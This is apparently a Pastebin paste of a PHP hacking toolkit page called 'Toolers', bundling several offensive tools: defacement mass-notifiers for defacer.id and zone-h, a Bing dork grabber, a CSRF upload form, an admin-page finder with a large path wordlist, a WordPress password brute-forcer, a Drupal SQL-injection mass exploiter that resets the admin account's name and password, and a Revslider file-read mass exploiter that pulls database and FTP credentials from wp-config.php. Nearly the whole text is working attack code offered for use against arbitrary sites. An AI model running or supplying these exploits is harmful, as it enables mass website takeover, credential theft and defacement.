Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- <html>
- <head>
- <title>Toolers</title>
- <meta name='author' content='Shun403'>
- <meta charset="UTF-8">
- <style type='text/css'>
- @import url(http://fonts.googleapis.com/css?family=Share+Tech+Mono);
- html {
- background: black;
- background-image:url(http://animeku.tv/wp-content/uploads/2017/01/Background-Animeku-cewe1.png);background-position:top center;background-size:cover;background-attachment:fixed;background-repeat:no-repeat;color:#a2a2a2;min-width:900px;font:12px titillium,arial;font-stretch:condensed;font-size:12px;margin:0;
- color: #ffffff;
- font-family: 'Share Tech Mono';
- font-size: 12px;
- width: 100%;
- }
- li {
- display: inline;
- margin: 1px;
- padding: 1px;
- }
- #menu a {
- padding:2px 10px;
- margin:0;
- background:#222222;
- text-decoration:none;
- letter-spacing:2px;
- padding: 2px 10px;
- margin: 0;
- background: #222222;
- text-decoration: none;
- letter-spacing: 2px;
- border-radius: 2px;
- border-bottom: 2px solid #B5AFAF;
- border-top: 2px solid #B5AFAF;
- border-right: 2px solid darkblue;
- border-left: 2px solid darkblue;
- }
- #menu a:hover {
- background:#180000;
- border-bottom:0px solid #333333;
- border-top:0px solid #333333;
- }
- table tr:first-child{
- background: red;
- text-align: center;
- color: white;
- }
- table, th, td {
- border-collapse:collapse;
- font-family: Tahoma, Geneva, sans-serif;
- background: transparent;
- font-family: 'Share Tech Mono';
- font-size: 13px;
- }
- .table_home, .th_home, .td_home {
- border: 1px solid blue;
- }
- th {
- padding: 10px;
- }
- a {
- color: #ffffff;
- text-decoration: none;
- }
- a:hover {
- color: blue;
- text-decoration: underline;
- }
- b {
- color: blue;
- }
- input[type=text], input[type=password],input[type=submit] {
- background: transparent;
- color: #ffffff;
- border: 1px solid #ffffff;
- margin: 5px auto;
- padding-left: 5px;
- font-family: 'Share Tech Mono';
- font-size: 13px;
- }
- input[type=submit] {
- background: transparent;
- color: #ffffff;
- border: 1px solid #ffffff;
- margin: 5px auto;
- padding-left: 5px;
- font-family: 'Share Tech Mono';
- font-size: 13px;
- cursor:pointer;
- }
- textarea {
- border: 1px solid #ffffff;
- width: 50%;
- height: 200px;
- padding-left: 5px;
- margin: 10px auto;
- resize: none;
- background: transparent;
- color: #ffffff;
- font-family: 'Share Tech Mono';
- font-size: 13px;
- }
- select {
- width: 152px;
- background: #000000;
- color: blue;
- border: 1px solid #ffffff;
- margin: 5px auto;
- padding-left: 5px;
- font-family: 'Share Tech Mono';
- font-size: 13px;
- }
- option:hover {
- background: blue;
- color: #000000;
- }
- .mybox{-moz-border-radius: 10px; border-radius: 10px;border:1px solid #ff0000; padding:4px 2px;width:70%;line-height:24px;background:none;box-shadow: 0px 4px 2px white;-webkit-box-shadow: 0px 4px 2px #ff0000;-moz-box-shadow: 0px 4px 2px #ff0000;}
- .cgx2 {text-align: center;letter-spacing:1px;font-family: "orbitron";color: #ff0000;font-size:25px;text-shadow: 5px 5px 5px black;}
- .infoweb {
- border-right: 1px solid #00FFFF;
- }
- </style>
- <script type="text/javascript" src="http://scmplayer.net/script.js"
- data-config="{'skin':'http://static.tumblr.com/uf7d8p8/5ylmihcdv/skinlindaawn.css','volume':100,'autoplay':true,'shuffle':false,'repeat':1,'placement':'bottom','showplaylist':false,'playlist':[{'title':'Porter Robinson & Madeon - Shelter','url':'https://www.youtube.com/watch?v=emsSkZu2eNU'},{'title':'OneOkRock-Answer Is Near','url':'https://www.youtube.com/watch?v=UlmhKXA77ro'},{'title':'NightCore - Hotaru','url':'https://www.youtube.com/watch?v=hUxvXv8Bp50'},{'title':'NightCore - Hey Soul Sister','url':'https://www.youtube.com/watch?v=jU2w4kZ6Rb0'},{'title':'NightCore - Apologize','url':'https://www.youtube.com/watch?v=Id9I1YHPWI4'},{'title':'NightCore - Fireflies','url':'https://www.youtube.com/watch?v=pIi_lbsR2ck'},{'title':'NightCore - Dare Yori Mo','url':'https://www.youtube.com/watch?v=P-ANXx_M7gc'},{'title':'Yiruma&Skullee-RiverFlowsInYou','url':'https://www.youtube.com/watch?v=GmBq7xN1Gqk'},{'title':'Teminite & Panda Eyes - Highscore','url':'https://www.youtube.com/watch?v=pEuVb3LhBYM'},{'title':'Parasyte ending - It%27s The Right Time','url':'https://www.youtube.com/watch?v=pcWSiNbP4k8'},{'title':'Tokyo Ghoul - Unravel Lyrics (Official Acoustic)','url':'https://www.youtube.com/watch?v=MMDU4hhRjQM'},{'title':'/PARASYTEost/ ~ Next to You ~ DRUMSTEP REMIX ~','url':'https://www.youtube.com/watch?v=xZYxNl6jP0Y'},{'title':'TheFatRat-NeverBeAlone','url':'https://www.youtube.com/watch?v=iyWjKQo9-m8'},{'title':'TheFatRat-Unity','url':'https://www.youtube.com/watch?v=CzCjMbYZWN8'},]}" ></script>
- <!-- SCM Music Player script end -->
- <?php
- echo "<div id='menu'>";
- echo "<hr color='red'>";
- echo "<hr color='blue'>";
- echo "<center>";
- echo "<ul>";
- echo "<li> <a href='?'>Home</a> </li>";
- echo "<li> <a href='?defacerid'>Defacer.id Mass Notify</a> </li>";
- echo "<li> <a href='?zoneh'>Zone-h Mass Notify</a> </li>";
- echo "<li> <a href='?bing'>Bing Grabber</a> </li>";
- echo "<li> <a href='?csrf'>Csrf Exploiter</a> </li>";
- echo "<li> <a href='?adfin'>Admin Finder</a> </li>";
- echo "<li> <a href='?drupal'>Drupal Mass Exploiter</a> </li>";
- echo "<li> <a href='?wpbf'>WordPress BruteForce</a> </li><br><br>";
- echo "<li> <a href='?revslider'>Revslider Mass Exploiter</a> </li>";
- echo "</ul>";
- echo "</center>";
- echo "<hr color='blue'>";
- echo "<hr color='red'>";
- echo "</div>";
- if(isset($_REQUEST['defacerid'])){
- echo "<center><form method='post'>
- <u>Defacer</u>: <br>
- <input type='text' name='hekel' size='50' value='NickMu'><br>
- <u>Team</u>: <br>
- <input type='text' name='tim' size='50' value='TeamMu'><br>
- <u>Domains</u>: <br>
- <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
- <input type='submit' name='go' value='Submit' style='width: 450px;'>
- </form>";
- $site = explode("\r\n", $_POST['sites']);
- $go = $_POST['go'];
- $hekel = $_POST['hekel'];
- $tim = $_POST['tim'];
- if($go) {
- foreach($site as $sites) {
- $zh = $sites;
- $form_url = "https://www.defacer.id/notify";
- $data_to_post = array();
- $data_to_post['attacker'] = "$hekel";
- $data_to_post['team'] = "$tim";
- $data_to_post['poc'] = 'SQL Injection';
- $data_to_post['url'] = "$zh";
- $curl = curl_init();
- curl_setopt($curl,CURLOPT_URL, $form_url);
- curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
- curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
- curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
- $result = curl_exec($curl);
- echo $result;
- curl_close($curl);
- echo "<br>";
- }
- }
- }
- if(isset($_REQUEST['zoneh'])){
- if($_POST['submit']) {
- $domain = explode("\r\n", $_POST['url']);
- $nick = $_POST['nick'];
- echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
- echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
- function zoneh($url,$nick) {
- $ch = curl_init("http://www.zone-h.com/notify/single");
- curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($ch, CURLOPT_POST, true);
- curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
- return curl_exec($ch);
- curl_close($ch);
- }
- foreach($domain as $url) {
- $zoneh = zoneh($url,$nick);
- if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
- echo "$url -> <font color=blue>OK</font><br>";
- } else {
- echo "$url -> <font color=red>ERROR</font><br>";
- }
- }
- }
- else {
- echo "<center><form method='post'>
- <u>Defacer</u>: <br>
- <input type='text' name='nick' size='50' value='NickMu'><br>
- <u>Domains</u>: <br>
- <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
- <input type='submit' name='submit' value='Submit' style='width: 450px;'>
- </form>";
- }
- echo "</center>";
- }
- if(isset($_REQUEST['bing'])){
- @ini_set('output_buffering',0);
- ?>
- <head>
- <style type="text/css">
- textarea {
- width: 500px;
- height: 250px;
- border: 1px solid #000000;
- margin: 5px auto;
- padding: 7px;
- }
- input[type=text] {
- padding-left: 7px;
- width: 250px;
- height: 25px;
- border: 1px solid #000000;
- background: blue;
- margin: 5px auto;
- }
- input[type=submit] {
- height: 25px;
- border: 1px solid #000000;
- background: red;
- margin: 5px auto;
- color: #000000;
- }
- </style>
- </head>
- <center><form method="post">
- <font color=red>Bing Dork: <input type="text" name="dork" placeholder="dork" required>
- <input type="submit" name="go" value=">>">
- </form>
- <?php
- // coded by Mr. Magnom
- // Re-Coded to Web Based by Mr. Error 404 - IndoXploit
- // greetz to Mr. Magnom - Sanjungan Jiwa
- function getsource($url, $proxy) {
- $curl = curl_init($url);
- curl_setopt($curl, CURLOPT_USERAGENT, $_SERVER['HTTP_USER_AGENT']);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
- if($proxy) {
- $proxy = explode(':', autoprox());
- curl_setopt($curl, CURLOPT_PROXY, $proxy[0]);
- curl_setopt($curl, CURLOPT_PROXYPORT, $proxy[1]);
- }
- $content = curl_exec($curl);
- curl_close($curl);
- return $content;
- }
- $dork = htmlspecialchars($_POST['dork']);
- $do = urlencode($dork);
- if(isset($_POST['go'])) {
- $npage = 1;
- $npages = 30000;
- $allLinks = array();
- $lll = array();
- while($npage <= $npages) {
- $x = getsource("http://www.bing.com/search?q=".$do."&first=".$npage."", $proxy);
- if($x) {
- preg_match_all('#<h2><a href="(.*?)" h="ID#', $x, $findlink);
- foreach ($findlink[1] as $fl) array_push($allLinks, $fl);
- $npage = $npage + 10;
- if (preg_match("(first=" . $npage . "&)siU", $x, $linksuiv) == 0) break;
- } else break;
- }
- $URLs = array();
- foreach($allLinks as $url){
- $exp = explode("/", $url);
- $URLs[] = $exp[2];
- }
- $array = array_filter($URLs);
- $array = array_unique($array);
- $sss = count(array_unique($array));
- echo "ToTaL SiTe : $sss<br>";
- foreach($array as $domain) {
- echo "http://$domain/<br>";
- }
- }
- }
- if(isset($_REQUEST['wpbf'])){
- set_time_limit(0);
- error_reporting(0);
- class rintoar{
- private $host;
- private $user;
- private $open;
- private $lista;
- public function banner() {
- echo(" <html>
- <head>
- <title>Wp-Brute Force</title>
- <style type='text/css'>
- .ext{
- color: blue;
- }
- .area{
- width:400px;
- height:350px;
- resize:none;
- }
- </style>
- </head>
- <body>
- <h1><center>WordPress Brute Force</center></h1>
- <form action='' method='POST'>
- <center>Host:<input type='text' name='host' placeholder='http://tager.com/' size='40' > </center><br>
- <center>User:<input type='text' name='user' value='admin' size='25'> </center><br>
- <center>Wordlist</center>
- <center><textarea class='area' name='lista'></textarea><br><br><center>
- <center><input type='Submit' value='Start'></center>
- </form>
- </body>
- </html>");
- }
- public function extract_post() {
- $this->host = $_POST["host"];
- $this->user = $_POST["user"];
- $this->open = $_POST["lista"];
- }
- public function Xregex() {
- if(preg_match("@/wp-login.php@", $this->host)) {
- return true;
- } else {
- $this->host = $_POST["host"]."/wp-login.php";
- }
- }
- public function brute() {
- $lista = array_filter(explode("\n", $this->open));
- foreach($lista as $this->lista) {
- for($i=0; $i < count($this->lista); $i++) {
- $this->Xcurl();
- }
- }
- }
- private function cool() {
- echo "[+] Host:"."<font color='white'>{$this->host}</font>";
- echo " <br/>[+] User:"."<font color='white'>{$this->user}</font>";
- echo " <br/>[+] Pass:"."<font color='white'>{$this->lista}</font>";
- }
- private function Xcurl() {
- $curl = curl_init();
- curl_setopt($curl, CURLOPT_URL, $this->host);
- curl_setopt($curl, CURLOPT_USERAGENT, $this->useragent);
- curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
- curl_setopt($curl, CURLOPT_CONNECTTIMEOUT, 10);
- curl_setopt($curl, CURLOPT_POST, true);
- curl_setopt($curl, CURLOPT_POSTFIELDS, "log=$this->user&pwd=$this->lista&wp-submit=Login&redirect_to=$this->host/wp-admin/");
- $exec = curl_exec($curl);
- $http = curl_getinfo($curl, CURLINFO_HTTP_CODE);
- $this->cool();
- if($http == 302) {
- echo "<font color='#00FF00'> <br/>[+] Success [+] Tinggal Login Aja</font><br>";
- break;
- } else {
- echo "<font color='red'><br/>[+] Failed</font><br>";
- }
- curl_close($curl);
- }
- }
- $wp = new rintoar();
- $wp->useragent = "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:40.0) Gecko/20100101 Firefox/40.0";
- $wp->banner();
- $wp->extract_post();
- $wp->Xregex();
- $wp->brute();
- }
- if(isset($_REQUEST['csrf'])){
- echo '<html>
- <center><h1 style="font-size:33px;">CSRF Exploiter </h1><br><br>
- <font size="3">*Note : Post File, Type : Filedata / dzupload / dzfile / dzfiles / file / ajaxfup / files[] / qqfile / userfile / etc</font>
- <br><br>
- <form method="post" style="font-size:25px;">
- URL: <input type="text" name="url" size="50" height="10" placeholder="http://www.target.com/path/upload.php" style="margin: 5px auto; padding-left: 5px;" required><br>
- POST File: <input type="text" name="pf" size="50" height="10" placeholder="Lihat diatas ^" style="margin: 5px auto; padding-left: 5px;" required><br>
- <input type="submit" name="d" value="Lock!">
- </form>';
- $url = $_POST["url"];
- $pf = $_POST["pf"];
- $d = $_POST["d"];
- if($d) {
- echo "<form method='post' target='_blank' action='$url' enctype='multipart/form-data'><input type='file' name='$pf'><input type='submit' name='g' value='Upload'></form></form>
- </html>";
- }
- }
- if(isset($_REQUEST['adfin'])){
- ?>
- <form action="?adfin" method="post">
- <?php
- set_time_limit(0);
- error_reporting(0);
- $list['front'] ="admin
- adm
- admincp
- admcp
- cp
- modcp
- moderatorcp
- adminare
- admins
- cpanel
- controlpanel";
- $list['end'] = "admin1.php
- adm/
- _adm_
- _admin_
- _administrator_
- operator
- sika
- adminweb
- develop
- ketua
- redaktur
- author
- user
- users
- dinkesadmin
- retel
- panel
- paneladmin
- panellogin
- redaksi
- cp-admin
- Login@web
- admin1
- admin2
- admin3
- admin4
- admin5
- admin6
- admin7
- admin8
- admin9
- admin10
- master
- master/index.php
- master/login.php
- terasadmin/index.php
- terasadmin/login.php
- rahasia
- rahasia/login.php
- rahasia/admin.php
- rahasia/index.php
- dinkesadmin/login.php
- adminpmb
- adminpmb/index.php
- adminpmb/login.php
- system
- system/index.php
- system/login.php
- system/admin.php
- webadmin
- webadmin/index.php
- webadmin/login.php
- wpanel
- wpanel/index.php
- wpanel/login.php
- adminpanel
- adminpanel/index.php
- adminpanel/login.php
- adminkec
- adminkec/index.php
- adminkec/login.php
- admindesa
- admindesa/index.php
- admindesa/login.php
- adminkota
- adminkota/index.php
- adminkota/login.php
- admin123
- admin123/index.php
- admin123/login.php
- logout
- logout/index.php
- logout/login.php
- logout/admin.php
- adminweb_setting
- admin1.html
- admin
- administrator
- admin1.html
- admin2.php
- admin2.html
- yonetim.php
- yonetim.html
- yonetici.php
- yonetici.html
- ccms/
- ccms/login.php
- ccms/index.php
- maintenance/
- webmaster/
- adm/
- configuration/
- configure/
- websvn/
- admin/
- admin/account.php
- admin/account.html
- admin/index.php
- admin/index.html
- admin/login.php
- admin/login.html
- admin/home.php
- admin/controlpanel.html
- admin/controlpanel.php
- admin.php
- admin.html
- admin/cp.php
- admin/cp.html
- cp.php
- cp.html
- administrator/
- administrator/index.html
- administrator/index.php
- administrator/login.html
- administrator/login.php
- administrator/account.html
- administrator/account.php
- administrator.php
- administrator.html
- login.php
- login.html
- modelsearch/login.php
- moderator.php
- moderator.html
- moderator/login.php
- moderator/login.html
- moderator/admin.php
- moderator/admin.html
- moderator/
- account.php
- account.html
- controlpanel/
- controlpanel.php
- controlpanel.html
- admincontrol.php
- admincontrol.html
- adminpanel.php
- adminpanel.html
- admin1.asp
- admin2.asp
- yonetim.asp
- yonetici.asp
- admin/account.asp
- admin/index.asp
- admin/login.asp
- admin/home.asp
- admin/controlpanel.asp
- admin.asp
- admin/cp.asp
- cp.asp
- administrator/index.asp
- administrator/login.asp
- administrator/account.asp
- administrator.asp
- login.asp
- modelsearch/login.asp
- moderator.asp
- moderator/login.asp
- moderator/admin.asp
- account.asp
- controlpanel.asp
- admincontrol.asp
- adminpanel.asp
- fileadmin/
- fileadmin.php
- fileadmin.asp
- fileadmin.html
- administration/
- administration.php
- administration.html
- sysadmin.php
- sysadmin.html
- phpmyadmin/
- myadmin/
- sysadmin.asp
- sysadmin/
- ur-admin.asp
- ur-admin.php
- ur-admin.html
- ur-admin/
- Server.php
- Server.html
- Server.asp
- Server/
- wp-admin/
- administr8.php
- administr8.html
- administr8/
- administr8.asp
- webadmin/
- webadmin.php
- webadmin.asp
- webadmin.html
- administratie/
- admins/
- admins.php
- admins.asp
- admins.html
- administrivia/
- Database_Administration/
- WebAdmin/
- useradmin/
- sysadmins/
- admin1/
- system-administration/
- administrators/
- pgadmin/
- directadmin/
- staradmin/
- ServerAdministrator/
- SysAdmin/
- administer/
- LiveUser_Admin/
- sys-admin/
- typo3/
- panel/
- cpanel/
- cPanel/
- cpanel_file/
- platz_login/
- rcLogin/
- blogindex/
- formslogin/
- autologin/
- support_login/
- meta_login/
- manuallogin/
- simpleLogin/
- loginflat/
- utility_login/
- showlogin/
- memlogin/
- members/
- login-redirect/
- sub-login/
- wp-login.php
- login1/
- dir-login/
- login_db/
- xlogin/
- smblogin/
- customer_login/
- UserLogin/
- login-us/
- acct_login/
- admin_area/
- bigadmin/
- project-admins/
- phppgadmin/
- pureadmin/
- sql-admin/
- radmind/
- openvpnadmin/
- wizmysqladmin/
- vadmind/
- ezsqliteadmin/
- hpwebjetadmin/
- newsadmin/
- adminpro/
- Lotus_Domino_Admin/
- bbadmin/
- vmailadmin/
- Indy_admin/
- ccp14admin/
- irc-macadmin/
- banneradmin/
- sshadmin/
- phpldapadmin/
- macadmin/
- administratoraccounts/
- admin4_account/
- admin4_colon/
- radmind-1/
- Super-Admin/
- AdminTools/
- cmsadmin/
- SysAdmin2/
- globes_admin/
- cadmins/
- phpSQLiteAdmin/
- navSiteAdmin/
- server_admin_small/
- logo_sysadmin/
- server/
- database_administration/
- power_user/
- system_administration/
- ss_vms_admin_sm/
- adminarea/
- bb-admin/
- adminLogin/
- panel-administracion/
- instadmin/
- memberadmin/
- administratorlogin/
- admin/admin.php
- admin_area/admin.php
- admin_area/login.php
- siteadmin/login.php
- siteadmin/index.php
- siteadmin/login.html
- admin/admin.html
- admin_area/index.php
- bb-admin/index.php
- bb-admin/login.php
- bb-admin/admin.php
- admin_area/login.html
- admin_area/index.html
- admincp/index.asp
- admincp/login.asp
- admincp/index.html
- webadmin/index.html
- webadmin/admin.html
- webadmin/login.html
- admin/admin_login.html
- admin_login.html
- panel-administracion/login.html
- nsw/admin/login.php
- webadmin/login.php
- admin/admin_login.php
- admin_login.php
- admin_area/admin.html
- pages/admin/admin-login.php
- admin/admin-login.php
- admin-login.php
- bb-admin/index.html
- bb-admin/login.html
- bb-admin/admin.html
- admin/home.html
- pages/admin/admin-login.html
- admin/admin-login.html
- admin-login.html
- admin/adminLogin.html
- adminLogin.html
- home.html
- rcjakar/admin/login.php
- adminarea/index.html
- adminarea/admin.html
- webadmin/index.php
- webadmin/admin.php
- user.html
- modelsearch/login.html
- adminarea/login.html
- panel-administracion/index.html
- panel-administracion/admin.html
- modelsearch/index.html
- modelsearch/admin.html
- admincontrol/login.html
- adm/index.html
- adm.html
- user.php
- panel-administracion/login.php
- wp-login.php
- adminLogin.php
- admin/adminLogin.php
- home.php
- adminarea/index.php
- adminarea/admin.php
- adminarea/login.php
- panel-administracion/index.php
- panel-administracion/admin.php
- modelsearch/index.php
- modelsearch/admin.php
- admincontrol/login.php
- adm/admloginuser.php
- admloginuser.php
- admin2/login.php
- admin2/index.php
- adm/index.php
- adm.php
- affiliate.php
- adm_auth.php
- memberadmin.php
- administratorlogin.php
- admin/admin.asp
- admin_area/admin.asp
- admin_area/login.asp
- admin_area/index.asp
- bb-admin/index.asp
- bb-admin/login.asp
- bb-admin/admin.asp
- pages/admin/admin-login.asp
- admin/admin-login.asp
- admin-login.asp
- user.asp
- webadmin/index.asp
- webadmin/admin.asp
- webadmin/login.asp
- admin/admin_login.asp
- admin_login.asp
- panel-administracion/login.asp
- adminLogin.asp
- admin/adminLogin.asp
- home.asp
- adminarea/index.asp
- adminarea/admin.asp
- adminarea/login.asp
- panel-administracion/index.asp
- panel-administracion/admin.asp
- modelsearch/index.asp
- modelsearch/admin.asp
- admincontrol/login.asp
- adm/admloginuser.asp
- admloginuser.asp
- admin2/login.asp
- admin2/index.asp
- adm/index.asp
- adm.asp
- affiliate.asp
- adm_auth.asp
- memberadmin.asp
- administratorlogin.asp
- siteadmin/login.asp
- siteadmin/index.asp
- ADMIN/
- paneldecontrol/
- login/
- cms/
- admon/
- ADMON/
- administrador/
- ADMIN/login.php
- panelc/
- ADMIN/login.html";
- function template() {
- echo '
- <script type="text/javascript">
- <!--
- function insertcode($text, $place, $replace)
- {
- var $this = $text;
- var logbox = document.getElementById($place);
- if($replace == 0)
- document.getElementById($place).innerHTML = logbox.innerHTML+$this;
- else
- document.getElementById($place).innerHTML = $this;
- //document.getElementById("helpbox").innerHTML = $this;
- }
- -->
- </script>
- <br>
- <br>
- <h1 class="technique-two">
- </h1>
- <div class="wrapper">
- <div class="red">
- <div class="tube">
- <center><table class="tabnet"><th colspan="2">Admin Finder</th><tr><td>
- <form action="" method="post" name="xploit_form">
- <tr>
- <tr>
- <b><td>URL</td>
- <td><input class="inputz" type="text" name="xploit_url" value="'.$_POST['xploit_url'].'" style="width: 350px;" />
- </td>
- </tr><tr>
- <td>404 string</td>
- <td><input class="inputz" type="text" name="xploit_404string" value="'.$_POST['xploit_404string'].'" style="width: 350px;" />
- </td></b>
- </tr><br><td>
- <span style="float: center;"><input class="inputzbut" type="submit" name="xploit_submit" value=" Start Scan" align="center" />
- </span></td></tr>
- </form></td></tr>
- <br /></table>
- </div> <!-- /tube -->
- </div> <!-- /red -->
- <br />
- <div class="green">
- <div class="tube" id="rightcol">
- Verificat: <span id="verified">0</span> / <span id="total">0</span><br />
- <b>Found ones:<br /></b>
- </div> <!-- /tube -->
- </div></center><!-- /green -->
- <br clear="all" /><br />
- <div class="blue">
- <div class="tube" id="logbox">
- <br />
- <br />
- Admin page Finder :<br /><br />
- </div> <!-- /tube -->
- </div> <!-- /blue -->
- </div> <!-- /wrapper -->
- <br clear="all"><br>';
- }
- function show($msg, $br=1, $stop=0, $place='logbox', $replace=0) {
- if($br == 1) $msg .= "<br />";
- echo "<script type=\"text/javascript\">insertcode('".$msg."', '".$place."', '".$replace."');</script>";
- if($stop == 1) exit;
- @flush();@ob_flush();
- }
- function check($x, $front=0) {
- global $_POST,$site,$false;
- if($front == 0) $t = $site.$x;
- else $t = 'http://'.$x.'.'.$site.'/';
- $headers = get_headers($t);
- if (!eregi('200', $headers[0])) return 0;
- $data = @file_get_contents($t);
- if($_POST['xploit_404string'] == "") if($data == $false) return 0;
- if($_POST['xploit_404string'] != "") if(strpos($data, $_POST['xploit_404string'])) return 0;
- return 1;
- }
- // --------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
- template();
- if(!isset($_POST['xploit_url'])) die;
- if($_POST['xploit_url'] == '') die;
- $site = $_POST['xploit_url'];
- if ($site[strlen($site)-1] != "/") $site .= "/";
- if($_POST['xploit_404string'] == "") $false = @file_get_contents($site."d65897f5380a21a42db94b3927b823d56ee1099a-this_can-t_exist.html");
- $list['end'] = str_replace("\r", "", $list['end']);
- $list['front'] = str_replace("\r", "", $list['front']);
- $pathes = explode("\n", $list['end']);
- $frontpathes = explode("\n", $list['front']);
- show(count($pathes)+count($frontpathes), 1, 0, 'total', 1);
- $verificate = 0;
- foreach($pathes as $path) {
- show('Checking '.$site.$path.' : ', 0, 0, 'logbox', 0);
- $verificate++; show($verificate, 0, 0, 'verified', 1);
- if(check($path) == 0) show('not found', 1, 0, 'logbox', 0);
- else{
- show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
- show('<a href="'.$site.$path.'">'.$site.$path.'</a>', 1, 0, 'rightcol', 0);
- }
- }
- preg_match("/\/\/(.*?)\//i", $site, $xx); $site = $xx[1];
- if(substr($site, 0, 3) == "www") $site = substr($site, 4);
- foreach($frontpathes as $frontpath) {
- show('Checking http://'.$frontpath.'.'.$site.'/ : ', 0, 0, 'logbox', 0);
- $verificate++; show($verificate, 0, 0, 'verified', 1);
- if(check($frontpath, 1) == 0) show('not found', 1, 0, 'logbox', 0);
- else{
- show('<span style="color: #FFFFFF;"><strong>found</strong></span>', 1, 0, 'logbox', 0);
- show('<a href="http://'.$frontpath.'.'.$site.'/">'.$frontpath.'.'.$site.'</a>', 1, 0, 'rightcol', 0);
- }
- }
- }
- if(isset($_REQUEST['drupal']))
- {
- echo "<body>
- <center>
- <h1 style='color:green;text-shadow:0.5px 0px 0px white;'>Drupal Mass Exploiter</h1>
- <form method='post' action=''>
- <textarea name='url' rows='30' cols='50'>
- http://www.site.com
- http://www.site2.com
- </textarea><br><br>
- <input type='submit' name='submit' value='Attack'>
- </form>
- <br>
- ";
- $drupal7 = $_GET['drupal7'];
- if($drupal7 == 'drupal7'){
- $filename = $_FILES['file']['name'];
- $filetmp = $_FILES['file']['tmp_name'];
- echo "<form method='POST' enctype='multipart/form-data'>
- <input type='file'name='file' />
- <input type='submit' value='drupal !' />
- </form>";
- move_uploaded_file($filetmp,$filename);
- }
- error_reporting(0);
- if (isset($_POST['submit'])) {
- function exploit($url) {
- $post_data = "name[0;update users set name %3D 'exeuser' , pass %3D '" . urlencode('$S$DrV4X74wt6bT3BhJa4X0.XO5bHXl/QBnFkdDkYSHj3cE1Z5clGwu') . "',status %3D'1' where uid %3D '1';#]=FcUk&name[]=Crap&pass=test&form_build_id=&form_id=user_login&op=Log+in";
- $params = array('http' => array('method' => 'POST', 'header' => "Content-Type: application/x-www-form-urlencoded
- ", 'content' => $post_data));
- $ctx = stream_context_create($params);
- $data = file_get_contents($url . '/user/login/', null, $ctx);
- if ((stristr($data, 'mb_strlen() expects parameter 1 to be string') && $data) || (stristr($data, 'FcUk Crap') && $data)) {
- $fp = fopen("xpld.txt", 'a+');
- fwrite($fp, "Exploitied User: exeuser Pass: admin =====> {$url}/user/login");
- fwrite($fp, "
- ");
- fwrite($fp, "--------------------------------------------------------------------------------------------------");
- fwrite($fp, "
- ");
- fclose($fp);
- echo "<font color='gold'><b>Success:<font color='red'> exeuser</font> Pass:<font color='red'> admin</font> =><a href='{$url}/user/login' target=_blank ><font color='green'> {$url}/user/login </font></a></font></b><br>";
- } else {
- echo "<font color='red'><b>Failed => {$url}/user/login</font></b><br>";
- }
- }
- $urls = explode("
- ", $_POST['url']);
- foreach ($urls as $url) {
- $url = @trim($url);
- echo exploit($url);
- }
- }
- }
- if(isset($_REQUEST['revslider'])){
- echo "<body>
- <center>
- mass revslider exploiting by mr.magnom recoded by exeuser<br>
- <form method='post'>
- <textarea name='sitessss' cols='50' rows='12'></textarea><br>
- <input type='submit' name='comeon' value='get'>
- </form>
- ";
- }
- function findit($mytext,$starttag,$endtag) {
- $posLeft = stripos($mytext,$starttag)+strlen($starttag);
- $posRight = stripos($mytext,$endtag,$posLeft+1);
- return substr($mytext,$posLeft,$posRight-$posLeft);
- }
- error_reporting(0);
- set_time_limit(0);
- $ya=$_POST['comeon'];
- $co=$_POST['sitessss'];
- if($ya){
- $e=explode("\r\n",$co);
- foreach($e as $bda){
- //echo '<br>'.$bda;
- $linkof='/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php';
- $dn=($bda).($linkof);
- $file=@file_get_contents($dn);
- if(eregi('DB_HOST',$file) and !eregi('FTP_USER',$file) ){
- echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
- echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
- echo "<font face='courier' color=lime >DB name : </font>".findit($file,"DB_NAME', '","');")."<br>";
- echo "<font face='courier' color=lime >DB user : </font>".findit($file,"DB_USER', '","');")."<br>";
- echo "<font face='courier' color=lime >DB pass : </font>".findit($file,"DB_PASSWORD', '","');")."<br>";
- echo "<font face='courier' color=lime >DB host : </font>".findit($file,"DB_HOST', '","');")."<br>";
- }
- elseif(eregi('DB_HOST',$file) and eregi('FTP_USER',$file)){
- echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
- echo "<center><font face='courier' color='#00BFFF' >".$bda."</font></center>";
- echo "<font face='courier' color=lime >FTP user : </font>".findit($file,"FTP_USER','","');")."<br>";
- echo "<font face='courier' color=lime >FTP pass : </font>".findit($file,"FTP_PASS','","');")."<br>";
- echo "<font face='courier' color=lime >FTP host : </font>".findit($file,"FTP_HOST','","');")."<br>";
- }
- else{echo "<center><font face='courier' color='yellow' >".$bda." ----> not infected </font></center>";}
- echo'<center><font face="courier" color=red >----------------------------------------------</font></center>';
- }
- }
- ?>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement